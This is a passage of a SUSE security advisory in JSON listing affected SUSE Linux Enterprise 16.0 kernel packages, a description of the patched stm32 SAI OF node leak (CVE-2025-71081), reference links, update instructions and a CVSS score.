"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "low"
}
],
"title": "CVE-2025-71080"
},
{
"cve": "CVE-2025-71081",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71081"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: stm32: sai: fix OF node leak on probe\n\nThe reference taken to the sync provider OF node when probing the\nplatform device is currently only dropped if the set_sync() callback\nfails during DAI probe.\n\nMake sure to drop the reference on platform probe failures (e.g. probe\ndeferral) and on driver unbind.\n\nThis also avoids a potential use-after-free in case the DAI is ever\nreprobed without first rebinding the platform driver.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71081",
"url": "https://www.suse.com/security/cve/CVE-2025-71081"
},
{
"category": "external",
"summary": "SUSE Bug 1256609 for CVE-2025-71081",
"url": "https://bugzilla.suse.com/1256609"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
